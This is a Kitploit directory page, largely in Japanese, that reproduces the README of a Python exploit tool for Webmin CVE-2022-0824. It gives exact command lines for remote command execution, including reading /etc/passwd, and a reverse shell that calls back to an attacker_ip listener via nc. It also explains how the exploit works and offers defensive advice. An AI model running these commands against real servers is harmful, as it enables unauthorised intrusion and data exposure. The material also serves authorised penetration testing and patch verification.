Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Webmin-CVE-2022-0824-Enhanced-Exploit — Webmin CVE-2022-0824向けPythonエクスプロイト。デュアルモード対応:直接コマンド実行とリバースシェル。複数のペイロードタイプ、インテリジェントなファイル管理、認可されたセキュリティテスト向けの詳細なデバッグログを備えています。 | Kitploit
ツール/GitHubGitHub/nudttan91/webmin-cve-2022-0824-enhanced-exploit
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミングリモートアクセスツールシェルコード生成

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubnudttan91/webmin-cve-2022-0824-enhanced-exploit

Webmin-CVE-2022-0824-Enhanced-Exploit

Webmin CVE-2022-0824向けPythonエクスプロイト。デュアルモード対応:直接コマンド実行とリバースシェル。複数のペイロードタイプ、インテリジェントなファイル管理、認可されたセキュリティテスト向けの詳細なデバッグログを備えています。

リポジトリを見る
1年前未レビュー

Webmin-CVE-2022-0824-Enhanced-Exploit

[!IMPORTANT]

Webmin CVE-2022-0824 拡張版エクスプロイトツール - コマンド実行とリバースシェルのデュアルモード対応

Python Version License CVE

[!IMPORTANT]

Webmin CVE-2022-0824 の脆弱性を狙った拡張版エクスプロイトツールです。直接のコマンド実行とリバースシェルの2つのモードに対応しています。

🚀 特徴

  • ✅ デュアルモード対応: コマンド実行モード + リバースシェルモード
  • ✅ 複数ペイロード: Perl、Bash、Pythonの3種類のペイロード
  • ✅ スマートなファイル管理: 一意のファイル名を自動生成し、ファイル競合を回避
  • ✅ 強制上書きアップロード: 既存ファイルの上書き問題を自動処理
  • ✅ 複数のアップロード方式: HTTPダウンロード、直接アップロード、コマンド実行による作成
  • ✅ 詳細なデバッグ情報: 完全な実行プロセスログ
  • ✅ ユーザーフレンドリーなUI: カラー出力と分かりやすいステータス表示

📋 脆弱性情報

  • CVE番号: CVE-2022-0824
  • 影響バージョン: Webmin < 1.990
  • 脆弱性タイプ: 任意ファイルアップロードによるリモートコード実行
  • CVSSスコア: 9.8 (Critical)

🛠️ インストール要件

root@kitploit:~
# Python 3.6+
pip3 install requests urllib3

📖 使い方

コマンド実行モード(推奨)

root@kitploit:~
# 基本命令执行
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "whoami"

# 查看系统信息
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "uname -a"

# 列出文件
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "ls -la /etc"

# 查看敏感文件
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "cat /etc/passwd"

# 网络信息
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "netstat -tulnp"

リバースシェルモード

root@kitploit:~
# 1. 启动监听器
nc -nlvp 9999

# 2. 执行漏洞利用
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 -L attacker_ip -P 9999

📝 パラメータ説明

*注:リバースシェルモードでは必須

🎯 使用例

例1:システム情報の収集

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "whoami && id && pwd"

例2:ファイルシステムの探索

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "find /home -name '*.txt' 2>/dev/null"

例3:ネットワーク設定の確認

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "ip addr show && route -n"

🔧 動作原理

  1. ログイン検証: 提供された認証情報を使用してWebmin管理画面にログイン
  2. ペイロード生成: モードに応じたCGIスクリプトを生成
  3. ファイルアップロード: ファイルマネージャのHTTPダウンロード機能を使用してペイロードをアップロード
  4. 権限設定: アップロードしたファイルに実行権限を設定
  5. コマンド実行: アップロードしたCGIスクリプトにアクセスしてコマンドを実行、またはリバース接続を確立

🛡️ 防御アドバイス

  • Webminを最新バージョン(>= 1.990)に更新する
  • Webmin管理画面へのネットワークアクセスを制限する
  • 強力なパスワードと二要素認証を使用する
  • システムログを定期的に監査する
  • Webアプリケーションファイアウォール(WAF)を導入する

⚠️ 免責事項

本ツールは、許可されたセキュリティテストおよび教育目的でのみ使用してください。

  • 🚫 無許可のシステムへの使用禁止
  • 🚫 悪意のある攻撃への使用禁止
  • 🚫 使用者は相応の法的責任を負うものとする
  • ✅ 明確な許可を得た環境でのみ使用する
  • ✅ セキュリティ研究と脆弱性検証に使用する

📚 技術詳細

ペイロードタイプ

  • Perl CGI: 主要ペイロード、互換性が最も高い
  • Bash CGI: 予備ペイロード、Linuxシステム向け
  • Python CGI: 予備ペイロード、機能が最も豊富

アップロード方式

  1. HTTPダウンロード: Webminファイルマネージャのリモートダウンロード機能を使用
  2. 直接アップロード: ファイルアップロードインターフェースを使用
  3. コマンド作成: システムコマンドでファイルを作成

ファイル命名戦略

  • コマンド内容に基づくMD5ハッシュ
  • タイムスタンプのサフィックス
  • 毎回異なるファイル名を使用することを保証

🔄 更新履歴

v5.0 (2025-08-05)

  • ✨ コマンド実行モードを新規追加
  • 🐛 ファイル上書き問題を修正
  • 🔧 ファイル命名戦略を改善
  • 📈 エラーハンドリングを強化

v4.0 (オリジナル版ベース)

  • 🎯 faisalfs10x のオリジナルコードに基づく
  • 🔧 CGI互換性を改善
  • 📝 詳細なログを追加

🤝 コントリビューション

IssueとPull Requestを歓迎します!

  1. 本プロジェクトをForkする
  2. 機能ブランチを作成する (git checkout -b feature/AmazingFeature)
  3. 変更をコミットする (git commit -m 'Add some AmazingFeature')
  4. ブランチにプッシュする (git push origin feature/AmazingFeature)
  5. Pull Requestを開く

📄 ライセンス

本プロジェクトはMITライセンスの下で提供されています - 詳細は LICENSE ファイルを参照してください

🙏 謝辞

  • オリジナルコード作者: @faisalfs10x
  • オリジナルプロジェクト: Webmin-CVE-2022-0824-revshell
  • CVE発見者: 関連するセキュリティ研究者

📞 連絡先

質問や提案がある場合は、以下の方法でご連絡ください:

  • 📧 GitHub Issueを送信
  • 🐛 セキュリティ問題の報告はDMで

⭐ このプロジェクトが役に立ったなら、Starでサポートしてください!

🔗 関連リンク

  • CVE-2022-0824 詳細
  • Webmin 公式サイト
  • オリジナルプロジェクト

requirements.txt

root@kitploit:~
requests>=2.25.1
urllib3>=1.26.0
ツールをダウンロード
パラメータ説明必須例
-t, --targetターゲットWebmin URL✅http://192.168.1.100:10000/
-c, --credentialログイン認証情報✅admin:password
-LS, --py3http_serverHTTPサーバーアドレス✅192.168.1.50:8080
--shell実行するコマンド❌"ls -la"
-L, --callback_ipリバースシェル接続先IP❌*192.168.1.50
-P, --callback_portリバースシェル接続先ポート❌*9999